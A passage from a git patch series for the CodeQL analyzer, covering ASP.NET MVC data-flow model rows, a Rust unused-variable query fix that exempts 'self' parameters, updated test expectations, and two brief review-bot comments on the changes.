- - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.Object)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"]
- - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"]
- - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String,System.Object)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "taint", "manual"]
- - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "()", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"]
- - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.Object)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"]
- - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"]
- - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "(System.String,System.Object)", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"]
+ - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"]
+ - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"]
From e52e1b0c1fe053bc096cd65fab956fea07181ce8 Mon Sep 17 00:00:00 2001
From: Geoffrey White <40627776+geoffw0@users.noreply.github.com>
Date: Fri, 6 Dec 2024 12:24:11 +0000
Subject: [PATCH 0865/1267] Rust: Add test case for 'self' in unused entities.
---
 .../unusedentities/UnusedValue.expected | 14 +++----
 .../unusedentities/UnusedVariable.expected | 41 ++++++++++---------
 .../test/query-tests/unusedentities/main.rs | 4 ++
 3 files changed, 32 insertions(+), 27 deletions(-)
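Review bot: Collapsing the four `View` overloads into one row with an empty signature changes the flow kind for `View(System.String,System.Object)` on the `ViewData` path: the removed row for that overload was `"taint"`, while the new catch-all `ViewData` row is `"value"`. If the old `taint` was deliberate, keep that overload as its own row; if it was a typo, saying so in the commit message would make the resulting change in query results expected. The empty signature also appears to match every `Controller.View` overload, including any added later, so a one-line YAML comment above the two rows such as `# empty signature: applies to every View overload` would record that this breadth is intended.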
diff --git a/rust/ql/test/query-tests/unusedentities/UnusedValue.expected b/rust/ql/test/query-tests/unusedentities/UnusedValue.expected
index f8538e5b8bc..d5b38540764 100644
--- a/rust/ql/test/query-tests/unusedentities/UnusedValue.expected
+++ b/rust/ql/test/query-tests/unusedentities/UnusedValue.expected
@@ -8,13 +8,13 @@ | main.rs:65:5:65:5 | f | Variable $@ is assigned a value that is never used. | main.rs:34:13:34:13 | f | f | | main.rs:67:5:67:5 | f | Variable $@ is assigned a value that is never used. | main.rs:34:13:34:13 | f | f | | main.rs:69:5:69:5 | g | Variable $@ is assigned a value that is never used. | main.rs:35:9:35:9 | g | g | -| main.rs:91:9:91:9 | a | Variable $@ is assigned a value that is never used. | main.rs:91:9:91:9 | a | a | -| main.rs:112:9:112:10 | is | Variable $@ is assigned a value that is never used. | main.rs:112:9:112:10 | is | is | -| main.rs:135:13:135:17 | total | Variable $@ is assigned a value that is never used. | main.rs:135:13:135:17 | total | total | -| main.rs:280:13:280:17 | total | Variable $@ is assigned a value that is never used. | main.rs:248:13:248:17 | total | total | -| main.rs:373:9:373:9 | x | Variable $@ is assigned a value that is never used. | main.rs:373:9:373:9 | x | x | -| main.rs:381:17:381:17 | x | Variable $@ is assigned a value that is never used. | main.rs:381:17:381:17 | x | x | -| main.rs:482:9:482:9 | c | Variable $@ is assigned a value that is never used. | main.rs:482:9:482:9 | c | c | +| main.rs:95:9:95:9 | a | Variable $@ is assigned a value that is never used. | main.rs:95:9:95:9 | a | a | +| main.rs:116:9:116:10 | is | Variable $@ is assigned a value that is never used. | main.rs:116:9:116:10 | is | is | +| main.rs:139:13:139:17 | total | Variable $@ is assigned a value that is never used. | main.rs:139:13:139:17 | total | total | +| main.rs:284:13:284:17 | total | Variable $@ is assigned a value that is never used. | main.rs:252:13:252:17 | total | total | +| main.rs:377:9:377:9 | x | Variable $@ is assigned a value that is never used. | main.rs:377:9:377:9 | x | x | +| main.rs:385:17:385:17 | x | Variable $@ is assigned a value that is never used. | main.rs:385:17:385:17 | x | x | +| main.rs:486:9:486:9 | c | Variable $@ is assigned a value that is never used. 
| main.rs:486:9:486:9 | c | c | | more.rs:44:9:44:14 | a_ptr4 | Variable $@ is assigned a value that is never used. | more.rs:44:9:44:14 | a_ptr4 | a_ptr4 | | more.rs:59:9:59:13 | d_ptr | Variable $@ is assigned a value that is never used. | more.rs:59:9:59:13 | d_ptr | d_ptr | | more.rs:65:9:65:17 | f_ptr | Variable $@ is assigned a value that is never used. | more.rs:65:13:65:17 | f_ptr | f_ptr | diff --git a/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected b/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected index dcfde3c46f5..302810e08e5 100644 --- a/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected +++ b/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected 
@@ -1,22 +1,23 @@ | main.rs:29:9:29:9 | a | Variable 'a' is not used. | -| main.rs:94:13:94:13 | d | Variable 'd' is not used. | -| main.rs:143:5:143:5 | y | Variable 'y' is not used. | -| main.rs:170:9:170:9 | x | Variable 'x' is not used. | -| main.rs:250:17:250:17 | a | Variable 'a' is not used. | -| main.rs:258:20:258:22 | val | Variable 'val' is not used. | -| main.rs:272:14:272:16 | val | Variable 'val' is not used. | -| main.rs:287:22:287:24 | val | Variable 'val' is not used. | -| main.rs:294:24:294:26 | val | Variable 'val' is not used. | -| main.rs:302:13:302:15 | num | Variable 'num' is not used. | -| main.rs:317:12:317:12 | j | Variable 'j' is not used. | -| main.rs:337:25:337:25 | y | Variable 'y' is not used. | -| main.rs:340:28:340:28 | a | Variable 'a' is not used. | -| main.rs:343:9:343:9 | p | Variable 'p' is not used. | -| main.rs:361:9:361:13 | right | Variable 'right' is not used. | -| main.rs:367:9:367:14 | right2 | Variable 'right2' is not used. | -| main.rs:374:13:374:13 | y | Variable 'y' is not used. | -| main.rs:382:21:382:21 | y | Variable 'y' is not used. | -| main.rs:427:26:427:28 | val | Variable 'val' is not used. | -| main.rs:430:21:430:23 | acc | Variable 'acc' is not used. | -| main.rs:451:9:451:14 | unused | Variable 'unused' is not used. | +| main.rs:89:19:89:22 | self | Variable 'self' is not used. | +| main.rs:98:13:98:13 | d | Variable 'd' is not used. | +| main.rs:147:5:147:5 | y | Variable 'y' is not used. | +| main.rs:174:9:174:9 | x | Variable 'x' is not used. | +| main.rs:254:17:254:17 | a | Variable 'a' is not used. | +| main.rs:262:20:262:22 | val | Variable 'val' is not used. | +| main.rs:276:14:276:16 | val | Variable 'val' is not used. | +| main.rs:291:22:291:24 | val | Variable 'val' is not used. | +| main.rs:298:24:298:26 | val | Variable 'val' is not used. | +| main.rs:306:13:306:15 | num | Variable 'num' is not used. | +| main.rs:321:12:321:12 | j | Variable 'j' is not used. 
| +| main.rs:341:25:341:25 | y | Variable 'y' is not used. | +| main.rs:344:28:344:28 | a | Variable 'a' is not used. | +| main.rs:347:9:347:9 | p | Variable 'p' is not used. | +| main.rs:365:9:365:13 | right | Variable 'right' is not used. | +| main.rs:371:9:371:14 | right2 | Variable 'right2' is not used. | +| main.rs:378:13:378:13 | y | Variable 'y' is not used. | +| main.rs:386:21:386:21 | y | Variable 'y' is not used. | +| main.rs:431:26:431:28 | val | Variable 'val' is not used. | +| main.rs:434:21:434:23 | acc | Variable 'acc' is not used. | +| main.rs:455:9:455:14 | unused | Variable 'unused' is not used. | | more.rs:24:9:24:11 | val | Variable 'val' is not used. | diff --git a/rust/ql/test/query-tests/unusedentities/main.rs b/rust/ql/test/query-tests/unusedentities/main.rs index bd4bc4d23e1..cc64f47986b 100644 --- a/rust/ql/test/query-tests/unusedentities/main.rs +++ b/rust/ql/test/query-tests/unusedentities/main.rs @@ -85,6 +85,10 @@ impl MyStruct { fn my_get(&mut self) -> i64 { return self.val; } + + fn get_flags(&self) -> i64 { // $ SPURIOUS: Alert[rust/unused-variable] + return 0; + } } fn structs() { From 281f8b1828eafc07a8014d2a307900d9599b853b Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 6 Dec 2024 12:29:07 +0000 Subject: [PATCH 0866/1267] Rust: Fix the unwanted results. --- rust/ql/src/queries/unusedentities/UnusedVariable.qll | 3 +++ .../ql/test/query-tests/unusedentities/UnusedVariable.expected | 1 - rust/ql/test/query-tests/unusedentities/main.rs | 2 +- 3 files changed, 4 insertions(+), 2 deletions(-) diff --git a/rust/ql/src/queries/unusedentities/UnusedVariable.qll b/rust/ql/src/queries/unusedentities/UnusedVariable.qll index d92f8787af1..38f09d0a500 100644 --- a/rust/ql/src/queries/unusedentities/UnusedVariable.qll +++ b/rust/ql/src/queries/unusedentities/UnusedVariable.qll 
@@ -23,4 +23,7 @@ predicate isUnused(Variable v) { predicate isAllowableUnused(Variable v) { // in a macro expansion v.getPat().isInMacroExpansion() + or + // a 'self' variable + v.getName() = "self" } diff --git a/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected b/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected index 302810e08e5..203824f4a4b 100644 --- a/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected +++ b/rust/ql/test/query-tests/unusedentities/UnusedVariable.expected @@ -1,5 +1,4 @@ | main.rs:29:9:29:9 | a | Variable 'a' is not used. | -| main.rs:89:19:89:22 | self | Variable 'self' is not used. | | main.rs:98:13:98:13 | d | Variable 'd' is not used. | | main.rs:147:5:147:5 | y | Variable 'y' is not used. | | main.rs:174:9:174:9 | x | Variable 'x' is not used. | diff --git a/rust/ql/test/query-tests/unusedentities/main.rs b/rust/ql/test/query-tests/unusedentities/main.rs index cc64f47986b..2f729690f92 100644 --- a/rust/ql/test/query-tests/unusedentities/main.rs +++ b/rust/ql/test/query-tests/unusedentities/main.rs @@ -86,7 +86,7 @@ impl MyStruct { return self.val; } - fn get_flags(&self) -> i64 { // $ SPURIOUS: Alert[rust/unused-variable] + fn get_flags(&self) -> i64 { return 0; } } From 43dd3ebf14c187ad5aad5b6d9d1fe225eac896bf Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Fri, 6 Dec 2024 14:07:42 +0100 Subject: [PATCH 0867/1267] Rust: Add variables test with captured self parameter --- .../test/library-tests/variables/Cfg.expected | 480 +++++++++--------- .../test/library-tests/variables/Ssa.expected | 58 ++- .../variables/variables.expected | 76 +-- .../test/library-tests/variables/variables.rs | 9 + 4 files changed, 342 insertions(+), 281 deletions(-) diff --git a/rust/ql/test/library-tests/variables/Cfg.expected b/rust/ql/test/library-tests/variables/Cfg.expected index 673f57d5e68..0763f7a4e4b 100644 --- a/rust/ql/test/library-tests/variables/Cfg.expected 
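Review bot: The new disjunct `v.getName() = "self"` in `isAllowableUnused` recognises the receiver only by its spelling, and the comment `// a 'self' variable` does not say why such a variable may go unused. I would expand the comment to something like `// a 'self' parameter: it is part of the method's signature, so it cannot be dropped or renamed to silence the alert`. Since `self` is a keyword in Rust, the name test presumably matches receivers only. If the library offers a way to ask whether a variable is declared by a self parameter, testing that would not depend on the string, but the hunk does not show whether such a predicate exists.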
+++ b/rust/ql/test/library-tests/variables/Cfg.expected 
@@ -1084,235 +1084,261 @@ edges | variables.rs:486:11:486:14 | self | variables.rs:486:11:486:14 | SelfParam | | | variables.rs:486:25:488:5 | { ... } | variables.rs:486:5:488:5 | exit fn id (normal) | | | variables.rs:487:9:487:12 | self | variables.rs:486:25:488:5 | { ... } | | -| variables.rs:491:1:498:1 | enter fn structs | variables.rs:492:5:492:36 | let ... = ... | | -| variables.rs:491:1:498:1 | exit fn structs (normal) | variables.rs:491:1:498:1 | exit fn structs | | -| variables.rs:491:14:498:1 | { ... } | variables.rs:491:1:498:1 | exit fn structs (normal) | | -| variables.rs:492:5:492:36 | let ... = ... | variables.rs:492:33:492:33 | 1 | | -| variables.rs:492:9:492:13 | a | variables.rs:493:5:493:26 | ExprStmt | match | -| variables.rs:492:17:492:35 | MyStruct {...} | variables.rs:492:9:492:13 | a | | -| variables.rs:492:33:492:33 | 1 | variables.rs:492:17:492:35 | MyStruct {...} | | -| variables.rs:493:5:493:13 | print_i64 | variables.rs:493:15:493:15 | a | | -| variables.rs:493:5:493:25 | print_i64(...) | variables.rs:494:5:494:14 | ExprStmt | | -| variables.rs:493:5:493:26 | ExprStmt | variables.rs:493:5:493:13 | print_i64 | | -| variables.rs:493:15:493:15 | a | variables.rs:493:15:493:24 | a.my_get(...) | | -| variables.rs:493:15:493:24 | a.my_get(...) | variables.rs:493:5:493:25 | print_i64(...) | | -| variables.rs:494:5:494:5 | a | variables.rs:494:5:494:9 | a.val | | -| variables.rs:494:5:494:9 | a.val | variables.rs:494:13:494:13 | 5 | | -| variables.rs:494:5:494:13 | ... = ... | variables.rs:495:5:495:26 | ExprStmt | | -| variables.rs:494:5:494:14 | ExprStmt | variables.rs:494:5:494:5 | a | | -| variables.rs:494:13:494:13 | 5 | variables.rs:494:5:494:13 | ... = ... | | -| variables.rs:495:5:495:13 | print_i64 | variables.rs:495:15:495:15 | a | | -| variables.rs:495:5:495:25 | print_i64(...) 
| variables.rs:496:5:496:28 | ExprStmt | | -| variables.rs:495:5:495:26 | ExprStmt | variables.rs:495:5:495:13 | print_i64 | | -| variables.rs:495:15:495:15 | a | variables.rs:495:15:495:24 | a.my_get(...) | | -| variables.rs:495:15:495:24 | a.my_get(...) | variables.rs:495:5:495:25 | print_i64(...) | | -| variables.rs:496:5:496:5 | a | variables.rs:496:25:496:25 | 2 | | -| variables.rs:496:5:496:27 | ... = ... | variables.rs:497:5:497:26 | ExprStmt | | -| variables.rs:496:5:496:28 | ExprStmt | variables.rs:496:5:496:5 | a | | -| variables.rs:496:9:496:27 | MyStruct {...} | variables.rs:496:5:496:27 | ... = ... | | -| variables.rs:496:25:496:25 | 2 | variables.rs:496:9:496:27 | MyStruct {...} | | -| variables.rs:497:5:497:13 | print_i64 | variables.rs:497:15:497:15 | a | | -| variables.rs:497:5:497:25 | print_i64(...) | variables.rs:491:14:498:1 | { ... } | | -| variables.rs:497:5:497:26 | ExprStmt | variables.rs:497:5:497:13 | print_i64 | | -| variables.rs:497:15:497:15 | a | variables.rs:497:15:497:24 | a.my_get(...) | | -| variables.rs:497:15:497:24 | a.my_get(...) | variables.rs:497:5:497:25 | print_i64(...) | | -| variables.rs:500:1:507:1 | enter fn arrays | variables.rs:501:5:501:26 | let ... = ... | | -| variables.rs:500:1:507:1 | exit fn arrays (normal) | variables.rs:500:1:507:1 | exit fn arrays | | -| variables.rs:500:13:507:1 | { ... } | variables.rs:500:1:507:1 | exit fn arrays (normal) | | -| variables.rs:501:5:501:26 | let ... = ... | variables.rs:501:18:501:18 | 1 | | -| variables.rs:501:9:501:13 | a | variables.rs:502:5:502:20 | ExprStmt | match | -| variables.rs:501:17:501:25 | [...] | variables.rs:501:9:501:13 | a | | -| variables.rs:501:18:501:18 | 1 | variables.rs:501:21:501:21 | 2 | | -| variables.rs:501:21:501:21 | 2 | variables.rs:501:24:501:24 | 3 | | -| variables.rs:501:24:501:24 | 3 | variables.rs:501:17:501:25 | [...] 
| | +| variables.rs:490:5:497:5 | enter fn my_method | variables.rs:490:23:490:26 | self | | +| variables.rs:490:5:497:5 | exit fn my_method (normal) | variables.rs:490:5:497:5 | exit fn my_method | | +| variables.rs:490:18:490:26 | SelfParam | variables.rs:491:9:494:10 | let ... = ... | | +| variables.rs:490:23:490:26 | self | variables.rs:490:18:490:26 | SelfParam | | +| variables.rs:490:29:497:5 | { ... } | variables.rs:490:5:497:5 | exit fn my_method (normal) | | +| variables.rs:491:9:494:10 | let ... = ... | variables.rs:491:21:494:9 | \|...\| ... | | +| variables.rs:491:13:491:17 | f | variables.rs:495:9:495:13 | ExprStmt | match | +| variables.rs:491:21:494:9 | \|...\| ... | variables.rs:491:13:491:17 | f | | +| variables.rs:491:21:494:9 | enter \|...\| ... | variables.rs:491:22:491:22 | n | | +| variables.rs:491:21:494:9 | exit \|...\| ... (normal) | variables.rs:491:21:494:9 | exit \|...\| ... | | +| variables.rs:491:22:491:22 | ... | variables.rs:493:13:493:26 | ExprStmt | | +| variables.rs:491:22:491:22 | n | variables.rs:491:22:491:22 | ... | match | +| variables.rs:491:25:494:9 | { ... } | variables.rs:491:21:494:9 | exit \|...\| ... (normal) | | +| variables.rs:493:13:493:16 | self | variables.rs:493:13:493:20 | self.val | | +| variables.rs:493:13:493:20 | self.val | variables.rs:493:25:493:25 | n | | +| variables.rs:493:13:493:25 | ... += ... | variables.rs:491:25:494:9 | { ... } | | +| variables.rs:493:13:493:26 | ExprStmt | variables.rs:493:13:493:16 | self | | +| variables.rs:493:25:493:25 | n | variables.rs:493:13:493:25 | ... += ... | | +| variables.rs:495:9:495:9 | f | variables.rs:495:11:495:11 | 3 | | +| variables.rs:495:9:495:12 | f(...) | variables.rs:496:9:496:13 | ExprStmt | | +| variables.rs:495:9:495:13 | ExprStmt | variables.rs:495:9:495:9 | f | | +| variables.rs:495:11:495:11 | 3 | variables.rs:495:9:495:12 | f(...) | | +| variables.rs:496:9:496:9 | f | variables.rs:496:11:496:11 | 4 | | +| variables.rs:496:9:496:12 | f(...) 
| variables.rs:490:29:497:5 | { ... } | | +| variables.rs:496:9:496:13 | ExprStmt | variables.rs:496:9:496:9 | f | | +| variables.rs:496:11:496:11 | 4 | variables.rs:496:9:496:12 | f(...) | | +| variables.rs:500:1:507:1 | enter fn structs | variables.rs:501:5:501:36 | let ... = ... | | +| variables.rs:500:1:507:1 | exit fn structs (normal) | variables.rs:500:1:507:1 | exit fn structs | | +| variables.rs:500:14:507:1 | { ... } | variables.rs:500:1:507:1 | exit fn structs (normal) | | +| variables.rs:501:5:501:36 | let ... = ... | variables.rs:501:33:501:33 | 1 | | +| variables.rs:501:9:501:13 | a | variables.rs:502:5:502:26 | ExprStmt | match | +| variables.rs:501:17:501:35 | MyStruct {...} | variables.rs:501:9:501:13 | a | | +| variables.rs:501:33:501:33 | 1 | variables.rs:501:17:501:35 | MyStruct {...} | | | variables.rs:502:5:502:13 | print_i64 | variables.rs:502:15:502:15 | a | | -| variables.rs:502:5:502:19 | print_i64(...) | variables.rs:503:5:503:13 | ExprStmt | | -| variables.rs:502:5:502:20 | ExprStmt | variables.rs:502:5:502:13 | print_i64 | | -| variables.rs:502:15:502:15 | a | variables.rs:502:17:502:17 | 0 | | -| variables.rs:502:15:502:18 | a[0] | variables.rs:502:5:502:19 | print_i64(...) | | -| variables.rs:502:17:502:17 | 0 | variables.rs:502:15:502:18 | a[0] | | -| variables.rs:503:5:503:5 | a | variables.rs:503:7:503:7 | 1 | | -| variables.rs:503:5:503:8 | a[1] | variables.rs:503:12:503:12 | 5 | | -| variables.rs:503:5:503:12 | ... = ... | variables.rs:504:5:504:20 | ExprStmt | | -| variables.rs:503:5:503:13 | ExprStmt | variables.rs:503:5:503:5 | a | | -| variables.rs:503:7:503:7 | 1 | variables.rs:503:5:503:8 | a[1] | | -| variables.rs:503:12:503:12 | 5 | variables.rs:503:5:503:12 | ... = ... | | +| variables.rs:502:5:502:25 | print_i64(...) | variables.rs:503:5:503:14 | ExprStmt | | +| variables.rs:502:5:502:26 | ExprStmt | variables.rs:502:5:502:13 | print_i64 | | +| variables.rs:502:15:502:15 | a | variables.rs:502:15:502:24 | a.my_get(...) 
| | +| variables.rs:502:15:502:24 | a.my_get(...) | variables.rs:502:5:502:25 | print_i64(...) | | +| variables.rs:503:5:503:5 | a | variables.rs:503:5:503:9 | a.val | | +| variables.rs:503:5:503:9 | a.val | variables.rs:503:13:503:13 | 5 | | +| variables.rs:503:5:503:13 | ... = ... | variables.rs:504:5:504:26 | ExprStmt | | +| variables.rs:503:5:503:14 | ExprStmt | variables.rs:503:5:503:5 | a | | +| variables.rs:503:13:503:13 | 5 | variables.rs:503:5:503:13 | ... = ... | | | variables.rs:504:5:504:13 | print_i64 | variables.rs:504:15:504:15 | a | | -| variables.rs:504:5:504:19 | print_i64(...) | variables.rs:505:5:505:18 | ExprStmt | | -| variables.rs:504:5:504:20 | ExprStmt | variables.rs:504:5:504:13 | print_i64 | | -| variables.rs:504:15:504:15 | a | variables.rs:504:17:504:17 | 1 | | -| variables.rs:504:15:504:18 | a[1] | variables.rs:504:5:504:19 | print_i64(...) | | -| variables.rs:504:17:504:17 | 1 | variables.rs:504:15:504:18 | a[1] | | -| variables.rs:505:5:505:5 | a | variables.rs:505:10:505:10 | 4 | | -| variables.rs:505:5:505:17 | ... = ... | variables.rs:506:5:506:20 | ExprStmt | | -| variables.rs:505:5:505:18 | ExprStmt | variables.rs:505:5:505:5 | a | | -| variables.rs:505:9:505:17 | [...] | variables.rs:505:5:505:17 | ... = ... | | -| variables.rs:505:10:505:10 | 4 | variables.rs:505:13:505:13 | 5 | | -| variables.rs:505:13:505:13 | 5 | variables.rs:505:16:505:16 | 6 | | -| variables.rs:505:16:505:16 | 6 | variables.rs:505:9:505:17 | [...] | | +| variables.rs:504:5:504:25 | print_i64(...) | variables.rs:505:5:505:28 | ExprStmt | | +| variables.rs:504:5:504:26 | ExprStmt | variables.rs:504:5:504:13 | print_i64 | | +| variables.rs:504:15:504:15 | a | variables.rs:504:15:504:24 | a.my_get(...) | | +| variables.rs:504:15:504:24 | a.my_get(...) | variables.rs:504:5:504:25 | print_i64(...) | | +| variables.rs:505:5:505:5 | a | variables.rs:505:25:505:25 | 2 | | +| variables.rs:505:5:505:27 | ... = ... 
| variables.rs:506:5:506:26 | ExprStmt | | +| variables.rs:505:5:505:28 | ExprStmt | variables.rs:505:5:505:5 | a | | +| variables.rs:505:9:505:27 | MyStruct {...} | variables.rs:505:5:505:27 | ... = ... | | +| variables.rs:505:25:505:25 | 2 | variables.rs:505:9:505:27 | MyStruct {...} | | | variables.rs:506:5:506:13 | print_i64 | variables.rs:506:15:506:15 | a | | -| variables.rs:506:5:506:19 | print_i64(...) | variables.rs:500:13:507:1 | { ... } | | -| variables.rs:506:5:506:20 | ExprStmt | variables.rs:506:5:506:13 | print_i64 | | -| variables.rs:506:15:506:15 | a | variables.rs:506:17:506:17 | 2 | | -| variables.rs:506:15:506:18 | a[2] | variables.rs:506:5:506:19 | print_i64(...) | | -| variables.rs:506:17:506:17 | 2 | variables.rs:506:15:506:18 | a[2] | | -| variables.rs:509:1:516:1 | enter fn ref_arg | variables.rs:510:5:510:15 | let ... = 16 | | -| variables.rs:509:1:516:1 | exit fn ref_arg (normal) | variables.rs:509:1:516:1 | exit fn ref_arg | | -| variables.rs:509:14:516:1 | { ... } | variables.rs:509:1:516:1 | exit fn ref_arg (normal) | | -| variables.rs:510:5:510:15 | let ... = 16 | variables.rs:510:13:510:14 | 16 | | -| variables.rs:510:9:510:9 | x | variables.rs:511:5:511:22 | ExprStmt | match | -| variables.rs:510:13:510:14 | 16 | variables.rs:510:9:510:9 | x | | -| variables.rs:511:5:511:17 | print_i64_ref | variables.rs:511:20:511:20 | x | | -| variables.rs:511:5:511:21 | print_i64_ref(...) | variables.rs:512:5:512:17 | ExprStmt | | -| variables.rs:511:5:511:22 | ExprStmt | variables.rs:511:5:511:17 | print_i64_ref | | -| variables.rs:511:19:511:20 | &x | variables.rs:511:5:511:21 | print_i64_ref(...) | | -| variables.rs:511:20:511:20 | x | variables.rs:511:19:511:20 | &x | | -| variables.rs:512:5:512:13 | print_i64 | variables.rs:512:15:512:15 | x | | -| variables.rs:512:5:512:16 | print_i64(...) | variables.rs:514:5:514:15 | let ... 
= 17 | | -| variables.rs:512:5:512:17 | ExprStmt | variables.rs:512:5:512:13 | print_i64 | | -| variables.rs:512:15:512:15 | x | variables.rs:512:5:512:16 | print_i64(...) | | -| variables.rs:514:5:514:15 | let ... = 17 | variables.rs:514:13:514:14 | 17 | | -| variables.rs:514:9:514:9 | z | variables.rs:515:5:515:22 | ExprStmt | match | -| variables.rs:514:13:514:14 | 17 | variables.rs:514:9:514:9 | z | | -| variables.rs:515:5:515:17 | print_i64_ref | variables.rs:515:20:515:20 | z | | -| variables.rs:515:5:515:21 | print_i64_ref(...) | variables.rs:509:14:516:1 | { ... } | | -| variables.rs:515:5:515:22 | ExprStmt | variables.rs:515:5:515:17 | print_i64_ref | | -| variables.rs:515:19:515:20 | &z | variables.rs:515:5:515:21 | print_i64_ref(...) | | -| variables.rs:515:20:515:20 | z | variables.rs:515:19:515:20 | &z | | -| variables.rs:523:3:525:3 | enter fn bar | variables.rs:523:15:523:18 | self | | -| variables.rs:523:3:525:3 | exit fn bar (normal) | variables.rs:523:3:525:3 | exit fn bar | | -| variables.rs:523:10:523:18 | SelfParam | variables.rs:524:5:524:32 | ExprStmt | | -| variables.rs:523:15:523:18 | self | variables.rs:523:10:523:18 | SelfParam | | -| variables.rs:523:21:525:3 | { ... } | variables.rs:523:3:525:3 | exit fn bar (normal) | | -| variables.rs:524:5:524:9 | * ... | variables.rs:524:29:524:29 | 3 | | -| variables.rs:524:5:524:31 | ... = ... | variables.rs:523:21:525:3 | { ... } | | -| variables.rs:524:5:524:32 | ExprStmt | variables.rs:524:6:524:9 | self | | -| variables.rs:524:6:524:9 | self | variables.rs:524:5:524:9 | * ... | | -| variables.rs:524:13:524:31 | MyStruct {...} | variables.rs:524:5:524:31 | ... = ... | | -| variables.rs:524:29:524:29 | 3 | variables.rs:524:13:524:31 | MyStruct {...} | | -| variables.rs:528:1:533:1 | enter fn ref_methodcall_receiver | variables.rs:529:3:529:34 | let ... = ... 
| | -| variables.rs:528:1:533:1 | exit fn ref_methodcall_receiver (normal) | variables.rs:528:1:533:1 | exit fn ref_methodcall_receiver | | -| variables.rs:528:30:533:1 | { ... } | variables.rs:528:1:533:1 | exit fn ref_methodcall_receiver (normal) | | -| variables.rs:529:3:529:34 | let ... = ... | variables.rs:529:31:529:31 | 1 | | -| variables.rs:529:7:529:11 | a | variables.rs:530:3:530:10 | ExprStmt | match | -| variables.rs:529:15:529:33 | MyStruct {...} | variables.rs:529:7:529:11 | a | | -| variables.rs:529:31:529:31 | 1 | variables.rs:529:15:529:33 | MyStruct {...} | | -| variables.rs:530:3:530:3 | a | variables.rs:530:3:530:9 | a.bar(...) | | -| variables.rs:530:3:530:9 | a.bar(...) | variables.rs:532:3:532:19 | ExprStmt | | -| variables.rs:530:3:530:10 | ExprStmt | variables.rs:530:3:530:3 | a | | -| variables.rs:532:3:532:11 | print_i64 | variables.rs:532:13:532:13 | a | | -| variables.rs:532:3:532:18 | print_i64(...) | variables.rs:528:30:533:1 | { ... } | | -| variables.rs:532:3:532:19 | ExprStmt | variables.rs:532:3:532:11 | print_i64 | | -| variables.rs:532:13:532:13 | a | variables.rs:532:13:532:17 | a.val | | -| variables.rs:532:13:532:17 | a.val | variables.rs:532:3:532:18 | print_i64(...) | | -| variables.rs:535:1:569:1 | enter fn main | variables.rs:536:5:536:25 | ExprStmt | | -| variables.rs:535:1:569:1 | exit fn main (normal) | variables.rs:535:1:569:1 | exit fn main | | -| variables.rs:535:11:569:1 | { ... } | variables.rs:535:1:569:1 | exit fn main (normal) | | -| variables.rs:536:5:536:22 | immutable_variable | variables.rs:536:5:536:24 | immutable_variable(...) | | -| variables.rs:536:5:536:24 | immutable_variable(...) | variables.rs:537:5:537:23 | ExprStmt | | -| variables.rs:536:5:536:25 | ExprStmt | variables.rs:536:5:536:22 | immutable_variable | | -| variables.rs:537:5:537:20 | mutable_variable | variables.rs:537:5:537:22 | mutable_variable(...) | | -| variables.rs:537:5:537:22 | mutable_variable(...) 
